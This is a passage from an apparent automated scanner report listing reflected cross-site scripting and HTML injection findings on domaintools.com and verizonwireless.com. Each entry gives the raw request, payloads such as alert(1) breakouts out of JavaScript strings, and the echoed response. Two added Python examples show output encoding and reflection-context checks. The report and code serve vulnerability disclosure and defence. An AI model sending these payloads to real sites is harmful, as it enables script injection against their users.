HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:15:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:15:15 GMT
Content-Length: 12175
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=whois-applicationsddbad"><a>45bf58e5a7c">
...[SNIP]...

3.173. http://www.domaintools.com/research/whois-applications/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /research/whois-applications/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5a0ea<a>e87b973b6c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /research/5a0ea<a>e87b973b6c8/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:15:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:15:25 GMT
Content-Length: 12022
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>e87b973b6c8">Whois record for "5a0ea<a>e87b973b6c8"</a>
...[SNIP]...

3.174. http://www.domaintools.com/research/whois-history/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /research/whois-history/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 570f6<a>08d0a1716c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /research/570f6<a>08d0a1716c/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:09:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:09:02 GMT
Content-Length: 12014
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>08d0a1716c">Whois record for "570f6<a>08d0a1716c"</a>
...[SNIP]...

3.175. http://www.domaintools.com/research/whois-history/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /research/whois-history/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fab1"><a>1aeb2533809 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /research/whois-history6fab1"><a>1aeb2533809/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:08:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:08:50 GMT
Content-Length: 12147
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=whois-history6fab1"><a>1aeb2533809">
...[SNIP]...

3.176. http://www.domaintools.com/sitemap/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /sitemap/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4ba9"><a>3cdf8fa2103 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sitemapd4ba9"><a>3cdf8fa2103/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:15:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:15:07 GMT
Content-Length: 12085
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=sitemapd4ba9"><a>3cdf8fa2103">
...[SNIP]...

3.177. http://www.domaintools.com/sitemap/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /sitemap/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 48f91<a>4a8c5c03304 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sitemap48f91<a>4a8c5c03304/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:15:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:15:17 GMT
Content-Length: 12064
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>4a8c5c03304">Whois record for "sitemap48f91<a>4a8c5c03304"</a>
...[SNIP]...
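The DomainTools entries above all reduce to one 404 template that copies the unknown path segment into two places: a double-quoted href attribute and the text of a "Whois record for" label. The following is an added example, not the site's code and not part of the scan report: the template is reconstructed from the two response snippets the report prints, the function names are this example's own, and the payloads are the report's. It shows why the text context and the attribute context need the same fix (entity encoding with quotes included, plus percent-encoding for the value that lands inside a URL) and checks the result with Python's HTML parser rather than by eye.

```python
"""Vulnerable and hardened renderings of the 404 fragment the report shows.

Added example, not the site's code: the template is reconstructed from the
two response snippets the report prints (an <a href="...whois&q=..."> link
and a 'Whois record for "..."' label); function names are this example's
own.  It shows why the text context and the attribute context need the
same fix, entity encoding with quotes included, and checks the outcome
with Python's HTML parser rather than by eye.
"""
import html
from html.parser import HTMLParser
from urllib.parse import quote

TEMPLATE = ('<a href="http://domaintools.com/go/?service=whois&q=%s">'
            'Whois record for "%s"</a>')


def render_vulnerable(segment: str) -> str:
    # The path segment is copied unchanged into an attribute and into text,
    # which is exactly what the report's response snippets show.
    return TEMPLATE % (segment, segment)


def render_hardened(segment: str) -> str:
    # The attribute slot holds a URL: percent-encode for the URL first, then
    # entity-encode for the attribute.  quote=True is what turns " into &quot;,
    # closing the '"><a>' break-out; &lt;/&gt; close the bare '<a>' case.
    in_href = html.escape(quote(segment, safe=""), quote=True)
    in_text = html.escape(segment, quote=True)
    return TEMPLATE % (in_href, in_text)


class _Audit(HTMLParser):
    """Record the start tags a browser would create and the first href."""

    def __init__(self):
        super().__init__()
        self.tags, self.href = [], None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "a" and self.href is None:
            self.href = dict(attrs).get("href")


def audit(markup: str):
    """Return (list of start tags, href of the first <a>) for `markup`.

    One <a> is expected; every extra tag is one the request injected.
    """
    p = _Audit()
    p.feed(markup)
    p.close()
    return p.tags, p.href


if __name__ == "__main__":
    # The report's two payload shapes for this host: a bare tag for the text
    # context and a quote-and-bracket break-out for the attribute context.
    for payload in ("81801<a>c88cfecc2ad", '9674b"><a>2dd03605f86'):
        print(payload)
        print("  vulnerable:", audit(render_vulnerable(payload)))
        print("  hardened:  ", audit(render_hardened(payload)))
```

The parser-based audit is the check worth keeping: the vulnerable rendering yields two anchors for the bare-tag payload and three for the attribute payload (the first href is cut short at the injected quote), while the hardened rendering yields exactly one anchor whose href still carries the full, percent-encoded segment.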

3.178. http://www.verizonwireless.com/b2c/shoppingAssistant [closeUrl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/shoppingAssistant

Issue detail

The value of the closeUrl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ac2b'%3balert(1)//5aadb58b643 was submitted in the closeUrl parameter. This input was echoed as 5ac2b';alert(1)//5aadb58b643 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b2c/shoppingAssistant?step=custType&item=phoneFirst&phoneID=5632&quantity=1&hasMultipleAssociatedSimTOs=false&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue5ac2b'%3balert(1)//5aadb58b643 HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceCategoryId=15
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312204729|session#1310993870949-319721#1310996989|check#true#1310995189; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmc=96859928; chkcookie=1310993892258; ZIPCODE=10010; CITY=New York; STATE=NY; devicePageView=list

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:44:03 GMT
Pragma: no-cache
Content-Length: 8020
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>
<head>
   <title>Shopping Cart</title>
   

                   
...[SNIP]...
window.location='/b2c/shoppingAssistant?step=shoppingAssistant&item=phoneFirst'+'&displayText=Phone&closeUrl='+escape('/b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&backTo=true5ac2b';alert(1)//5aadb58b643');
        } else if (data.nextStep == 'bogo'){
           
           window.location='/b2c/shoppingAssistant?step=bogo&item=phoneFirst&phoneID=5632';
               }
       }
       });
   
   
}
</sc
...[SNIP]...

3.179. http://www.verizonwireless.com/b2c/shoppingAssistant [displayText parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/shoppingAssistant

Issue detail

The value of the displayText request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0b8a"-alert(1)-"52dbce692bd was submitted in the displayText parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b2c/shoppingAssistant?step=shoppingAssistant&item=phoneFirst&displayText=Phoned0b8a"-alert(1)-"52dbce692bd&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/shoppingAssistant?step=custType&item=phoneFirst&phoneID=5632&quantity=1&hasMultipleAssociatedSimTOs=false&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312206231|session#1310993870949-319721#1310998491|check#true#1310996691; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmc=96859928; chkcookie=1310993892258; ZIPCODE=10010; CITY=New York; STATE=NY; devicePageView=list

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:44:05 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 15106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- Main JSP for the new shopping Assistant -->


<html xmlns="http://www.w3.org/1
...[SNIP]...
<script type="text/javascript">
           addLoadEvent(setButtons);
           addLoadEvent(png_init);
           
           var currentSA="/b2c/shoppingAssistant?step=shoppingAssistant&item=phoneFirst&displayText=Phoned0b8a"-alert(1)-"52dbce692bd&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue";
           function continueToPlan() {
           
                    phoneFirst.continueToPlan('phoneFirst', funct
...[SNIP]...

3.180. http://www.verizonwireless.com/b2c/shoppingAssistant [hasMultipleAssociatedSimTOs parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/shoppingAssistant

Issue detail

The value of the hasMultipleAssociatedSimTOs request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 34aa8%3balert(1)//3e4ef288914 was submitted in the hasMultipleAssociatedSimTOs parameter. This input was echoed as 34aa8;alert(1)//3e4ef288914 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b2c/shoppingAssistant?step=custType&item=phoneFirst&phoneID=5632&quantity=1&hasMultipleAssociatedSimTOs=false34aa8%3balert(1)//3e4ef288914&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceCategoryId=15
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312204729|session#1310993870949-319721#1310996989|check#true#1310995189; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmc=96859928; chkcookie=1310993892258; ZIPCODE=10010; CITY=New York; STATE=NY; devicePageView=list

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:44:03 GMT
Pragma: no-cache
Content-Length: 8019
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>
<head>
   <title>Shopping Cart</title>
   

                   
...[SNIP]...
<script type="text/javascript">
   function continueshopping() {

   
           phoneFirst.addPhone('phoneFirst',5632,1 ,false34aa8;alert(1)//3e4ef288914, function(data) {
       if(data.result){

           if(data.nextStep == 'serverError'){
               $('setError').set('html',data.errorMessage);
                   overlay.passFrameSize();
               document.locati
...[SNIP]...
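By this point the report has described every reflection context it distinguishes: plain text between tags and a double-quoted attribute (the DomainTools entries), and a single-quoted JavaScript string, a double-quoted JavaScript string and an unquoted JavaScript expression (3.178 to 3.180). The classifier below is an added example, not the scanner's code and not part of the report: it re-implements offline the judgement those "Issue detail" paragraphs state in words, so a practitioner can re-check a reflection from a saved response without re-sending traffic. The SAMPLES bodies are constructed from the response snippets printed in the report, the payload strings are the report's own, and the last sample is a constructed entity-encoded variant showing what a fixed response would classify as.

```python
"""Classify where a reflected scanner canary landed in a response body.

Added example, not the scanner's code: the SAMPLES bodies are constructed
from the report's response snippets; the payloads are the report's own.
"""
from __future__ import annotations

import html
from dataclasses import dataclass

_NAMES = {"'": "single", '"': "double"}


@dataclass
class Reflection:
    found: bool      # payload appears verbatim in the body
    encoded: bool    # payload appears only in HTML-entity-encoded form
    context: str     # where the verbatim copy landed


def _open_quote(fragment: str) -> str | None:
    """Quote character still open at the end of `fragment`, or None.

    Minimal state machine: a quote opens a literal, the same quote closes it,
    a backslash escapes the next character.  Comments and template literals
    are not modelled, which is enough for the report's snippets.
    """
    state = None
    i = 0
    while i < len(fragment):
        ch = fragment[i]
        if state is not None and ch == "\\":
            i += 2
            continue
        if state is None and ch in "\"'":
            state = ch
        elif ch == state:
            state = None
        i += 1
    return state


def _context_at(body: str, pos: int) -> str:
    before = body[:pos]
    lower = before.lower()
    open_script = lower.rfind("<script")
    if open_script > lower.rfind("</script"):
        # Inside an unclosed <script>: inspect the JavaScript emitted so far.
        js = before[open_script:]
        js = js[js.find(">") + 1:]
        q = _open_quote(js)
        return (f"{_NAMES[q]}-quoted JavaScript string" if q
                else "unquoted JavaScript expression")
    last_lt = before.rfind("<")
    if last_lt > before.rfind(">"):
        # Inside a tag that has not yet been closed with '>'.
        q = _open_quote(before[last_lt + 1:])
        return (f"{_NAMES[q]}-quoted HTML attribute value" if q
                else "unquoted HTML attribute or tag name")
    return "HTML text between tags"


def classify(body: str, payload: str) -> Reflection:
    """Find the canary and name its context; an entity-encoded copy is not a hit."""
    pos = body.find(payload)
    if pos >= 0:
        return Reflection(True, False, _context_at(body, pos))
    if html.escape(payload, quote=True) in body:
        return Reflection(False, True, "HTML-entity-encoded (tags neutralised)")
    return Reflection(False, False, "not reflected")


# Constructed from the report's response snippets; payloads are the report's.
SAMPLES = {
    "text": ('<a>c88cfecc2ad">Whois record for "reverse-ip81801<a>c88cfecc2ad"</a>',
             "81801<a>c88cfecc2ad"),
    "attr": ('<a href="http://domaintools.com/go/?service=whois&q=reverse-ip9674b"><a>2dd03605f86">',
             '9674b"><a>2dd03605f86'),
    "js_single": ("<script type=\"text/javascript\">\nwindow.location='/b2c/shoppingAssistant"
                  "?step=shoppingAssistant&item=phoneFirst'+'&displayText=Phone&closeUrl='"
                  "+escape('/b2c/store/controller?item=phoneFirst&backTo=true5ac2b';alert(1)"
                  "//5aadb58b643');\n</script>", "5ac2b';alert(1)//5aadb58b643"),
    "js_double": ('<script type="text/javascript">\nvar currentSA="/b2c/shoppingAssistant'
                  '?step=shoppingAssistant&item=phoneFirst&displayText=Phoned0b8a"-alert(1)-'
                  '"52dbce692bd&closeUrl=x";\n</script>', 'd0b8a"-alert(1)-"52dbce692bd'),
    "js_bare": ('<script type="text/javascript">\nfunction continueshopping() {\n'
                "    phoneFirst.addPhone('phoneFirst',5632,1 ,false34aa8;alert(1)//3e4ef288914,"
                " function(data) {\n</script>", "34aa8;alert(1)//3e4ef288914"),
    # Constructed: how the DomainTools label would look once entity-encoded.
    "fixed": ('Whois record for "ad1dd&lt;a&gt;b098f8c0d3c"', "ad1dd<a>b098f8c0d3c"),
}

if __name__ == "__main__":
    for name, (body, payload) in SAMPLES.items():
        print(f"{name:10} {classify(body, payload)}")
```

The quote tracking is deliberately naive; it is a triage aid for reading saved responses, and a `//` comment or a template literal ahead of the canary can mislead it, which is also why the report itself asks for manual examination before calling a reflection exploitable.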

3.181. http://www.verizonwireless.com/b2c/shoppingAssistant [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/shoppingAssistant

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb600"-alert(1)-"8e3e52beae3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b2c/shoppingAssistant?step=shoppingAssistant&item=phoneFirst&displayText=Phone&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue&cb600"-alert(1)-"8e3e52beae3=1 HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/shoppingAssistant?step=custType&item=phoneFirst&phoneID=5632&quantity=1&hasMultipleAssociatedSimTOs=false&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312206231|session#1310993870949-319721#1310998491|check#true#1310996691; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmc=96859928; chkcookie=1310993892258; ZIPCODE=10010; CITY=New York; STATE=NY; devicePageView=list

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:44:10 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 15118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- Main JSP for the new shopping Assistant -->


<html xmlns="http://www.w3.org/1
...[SNIP]...
       var currentSA="/b2c/shoppingAssistant?step=shoppingAssistant&item=phoneFirst&displayText=Phone&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue&cb600"-alert(1)-"8e3e52beae3=1";
           function continueToPlan() {
           
                    phoneFirst.continueToPlan('phoneFirst', function(data) {
            if(data.result){
            // alert("called");
               if(window.parent.location){

...[SNIP]...

3.182. http://www.verizonwireless.com/b2c/shoppingAssistant [phoneID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/shoppingAssistant

Issue detail

The value of the phoneID request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c68ab%3balert(1)//0c4b84ca3ab was submitted in the phoneID parameter. This input was echoed as c68ab;alert(1)//0c4b84ca3ab in the application's response.

